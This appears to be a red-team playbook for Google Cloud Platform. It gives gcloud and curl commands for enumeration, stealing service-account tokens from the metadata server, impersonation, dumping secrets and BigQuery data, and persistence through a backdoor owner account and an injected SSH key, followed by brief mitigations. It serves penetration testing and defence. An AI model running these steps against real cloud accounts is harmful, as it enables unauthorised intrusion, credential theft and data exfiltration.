GCP
This playbook outlines offensive security techniques in Google Cloud Platform (GCP). It is structured around the red teaming lifecycle: reconnaissance, exploitation, privilege escalation, lateral move
1. GCP Cloud Overview
Core Components
Google Cloud IAM – Identity and Access Management (users, service accounts, roles, policies).
Projects – Organizational units that contain resources.
Service Accounts – Identities for workloads (VMs, functions, apps).
Cloud Resource Hierarchy – Org → Folders → Projects → Resources.
Planes of Access
Control Plane – Google Cloud Console, Cloud SDK (
gcloud
), REST APIs.Data Plane – Actual workloads (VMs, buckets, databases).
🔑 Security Insight:
Compromise of Control Plane creds = full takeover.
Compromise of Service Account = privilege within project scope (but often escalatable).
2. Authentication & Credential Types
2.1 User Accounts
Human users with Google identities (
[email protected]
,[email protected]
).
2.2 Service Accounts
Non-human principals for apps/VMs.
Auth via JSON key files or Metadata Server.
2.3 Access Tokens
OAuth2 bearer tokens (short-lived).
Commonly abused via SSRF → metadata server.
Get token inside VM
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
3. Enumeration
3.1 Identity Enumeration
Check current active account:
gcloud auth list
Get project ID:
gcloud config get-value project
List IAM policy for a project:
gcloud projects get-iam-policy <project-id> --format=json
Find specific service account roles:
gcloud projects get-iam-policy <project-id> --format=json \
| jq '.bindings[] | select(.members[] | contains("serviceAccount:dev-sa@<project>.iam.gserviceaccount.com")) | .role'
3.2 Service Account Enumeration
List all service accounts in a project:
gcloud iam service-accounts list --project <project-id>
Get details about a service account:
gcloud iam service-accounts describe <sa-name>@<project>.iam.gserviceaccount.com
List keys associated with a service account:
gcloud iam service-accounts keys list --iam-account <sa-name>@<project>.iam.gserviceaccount.com
3.3 Storage Enumeration
List storage buckets:
gcloud storage buckets list --project <project-id>
List objects in a bucket:
gcloud storage objects list gs://<bucket-name>
Download file from bucket:
gcloud storage cp gs://<bucket-name>/<object> ./localfile
4. Exploitation
4.1 Metadata Service Abuse (IMDS Equivalent)
Inside a VM, access metadata endpoint:
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
Use the token to authenticate:
export ACCESS_TOKEN=$(curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google" | jq -r .access_token)
gcloud auth activate-access-token $ACCESS_TOKEN
4.2 Using Leaked Tokens
If attacker has a token (e.g., from logs, SSRF):
echo "<token>" > token.txt
gcloud auth activate-access-token $(cat token.txt)
Example (from CTF-like scenario):
gcloud projects get-iam-policy <project-id> --format=json --access-token-file token.txt
4.3 Privilege Escalation via Service Accounts
If SA has roles like roles/iam.serviceAccountUser
or roles/editor
, attacker can impersonate or escalate:
gcloud auth print-access-token --impersonate-service-account=<target-sa>@<project>.iam.gserviceaccount.com
5. Post-Exploitation
5.1 Key Vaults / Secrets
If Cloud KMS or Secret Manager accessible:
gcloud secrets list --project <project-id>
gcloud secrets versions access latest --secret=<secret-name> --project <project-id>
5.2 BigQuery Data Dumping
gcloud bigquery datasets list --project <project-id>
gcloud bigquery tables list --dataset_id <dataset>
gcloud bigquery tables describe <dataset>.<table>
6. Lateral Movement
Use compromised service account to pivot into other projects.
Enumerate organization-level roles:
gcloud organizations get-iam-policy <org-id> --format=json
Abuse roles like
roles/resourcemanager.folderViewer
,roles/resourcemanager.projectMover
for movement.
7. Persistence
Create new service account and assign roles:
gcloud iam service-accounts create attacker-sa --display-name "Backdoor"
gcloud projects add-iam-policy-binding <project-id> \
--member="serviceAccount:attacker-sa@<project-id>.iam.gserviceaccount.com" \
--role="roles/owner"
Add SSH key to compromised VM instance:
gcloud compute instances add-metadata <vm-name> \
--metadata ssh-keys="attacker:<public-key>"
8. Detection & Mitigation
Monitor IAM policy changes (Cloud Audit Logs).
Restrict service account privileges (principle of least privilege).
Restrict metadata access (firewall, no public SSRF exposure).
Rotate keys/tokens frequently.
Enable VPC Service Controls to limit lateral movement.
Last updated